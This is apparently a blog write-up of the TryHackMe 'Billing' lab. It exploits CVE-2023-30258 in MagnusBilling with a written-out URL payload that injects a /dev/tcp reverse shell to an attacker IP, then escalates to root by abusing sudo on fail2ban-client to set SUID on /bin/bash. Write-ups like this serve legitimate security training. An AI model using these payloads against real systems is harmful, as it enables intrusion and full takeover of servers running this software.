nekr0ff

Hacking the matrix, one phish at a time

nekr0ff

Billing – THM Writeup

billing thm writeup

Reconnaissance

Port Scan

We start using rustscan to make a scan of the version and vulnerabilities of the open ports of the machine:

rustscan -a 10.112.148.182 -- -sCV -oN target
  • -a: specifies the target IP address to scan
  • --: separates rustscan arguments from nmap arguments
  • -sC: runs default nmap scripts for additional enumeration
  • -sV: detects service versions running on open ports
  • -oN: saves scan output in normal format to specified file

Obtaining this info of the open ports:

  • 22 – SSH – OpenSSH 9.2p1 Debian
  • 80 – HTTP – Apache httpd 2.4.62
    • http-robots.txt: 1 disallowed entry
      • /mbilling/
  • 3306 – MySQL – MariaDB 10.3.23 or earlier (unauthorized)
  • 5038 – asterisk – Asterisk Call Manager 2.10.6

Initial Access

Inside, we see that we have a login page with the title Magnus Billing which seems to be a legit software.

On internet, we search for Magnus Billing vulnerabilities and we get to this metasploit exploit:

https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/http/magnusbilling_unauth_rce_cve_2023_30258.rb

To use this we follow this steps:

  1. msfconsole to start the Metasploit console
  2. use exploit/linux/http/magnusbilling_unauth_rce_cve_2023_30258
  3. set SRVHOST LOCAL-IP
  4. set RHOSTS MACHINE-IP
  5. set LHOST LOCAL-IP
  6. run

The difference between a Script kiddie and a real pentester is to understand why this exploit woks. If you don’t want to know why this works, go to the Privilege Escalation part.

Explanation of the exploit

This exploit is abusing CVE-2023-30258 which is a Command Injection vulnerability on MagnusBilling 6.x and 7.x

This vulnerability exists because there is a file at lib/icepay/icepay.php which receives the democ parameter via URL (with a GET reqeuest).

The code gets the democ parameter and insert it directly on the exec() function without sanititzation.

The exploit abuses this, by sending a democ parameter manipulated with this form:

/dev/null;{COMMAND-TO-EXECUTE};#

By this, it executes whatever command you want and you ensure that nothing else gets executed by using ;#

So, we don’t need metasploit, we can manually exploit this by:

  1. Start a listener with penelope or netcat (nc -nlvp 4444)
  2. Start CAIDO or BurpSuite
  3. Intercept any request
  4. Make a request to this endpoint URLencoding the ?democ payload 
http://MACHINE-IP/mbilling/lib/icepay/icepay.php?democ=dev/null;bash -c '/bin/bash -i >& /dev/tcp/LOCAL-IP/4444 0>&1';#
  • democ=dev/null: redirects standard output to /dev/null to discard any output
  • bash -c: executes the following command string in a new bash shell
  • /bin/bash -i: starts an interactive bash shell
  • >&: redirects both stdout and stderr to the specified destination
  • /dev/tcp/LOCAL-IP/4444: creates a TCP connection to the attacker’s IP on port 4444
  • >&1: redirects stdin to the same destination as stdout, completing the reverse shell
  • ;#: comments out any remaining code to prevent execution errors

And there we go, we have a reverse shell and we can read the user.txt

Privilege Escalation

Now, if we have started the reverse shell with Penelope, we can execute the linpeas.sh by following this steps:

  1. Press F12
  2. run peass_ng
  3. sessions 1 → to return to our reverse shell

We see that, with sudo -l we can execute the fail2ban-client binary, so we search at on google and we find:

https://exploit-notes.hdks.org/exploit/linux/privilege-escalation/sudo/fail2ban-command

  1. Get jail list: sudo /usr/bin/fail2ban-client status
  2. Choose one of the jails: sudo /usr/bin/fail2ban-client get <JAIL> actions
  3. Create a new action with name pwn: sudo /usr/bin/fail2ban-client set <JAIL> addaction pwn
  4. Set payload to actionban →. give SUID privileges to the /bin/bash: sudo /usr/bin/fail2ban-client set <JAIL> action pwn actionban "chmod +s /bin/bash"
  5. Trigger the action: sudo /usr/bin/fail2ban-client set <JAIL> banip 1.2.3.5
  6. Get root shell: /bin/bash -p

And there we go, we have completed the Billing machine.

Conclusion

This writeup demonstrated a complete penetration test of the Billing TryHackMe machine, showcasing both automated and manual exploitation techniques. We exploited CVE-2023-30258, a command injection vulnerability in MagnusBilling’s icepay.php file, to gain initial access as the www-data user. Understanding the vulnerability mechanism allowed us to bypass the need for Metasploit and craft a manual exploit. For privilege escalation, we leveraged sudo permissions on fail2ban-client to create a malicious action that set the SUID bit on /bin/bash, ultimately achieving root access. This machine effectively illustrated the importance of understanding exploit mechanics rather than relying solely on automated tools, as well as the critical security risks posed by unsanitized user input and overly permissive sudo configurations.

Video Walkthrough

Here you can find a video walkthrough of this machine.

https://youtu.be/Myu6yf5pOck
Index
root@nekr0ff:~$ cd $HOME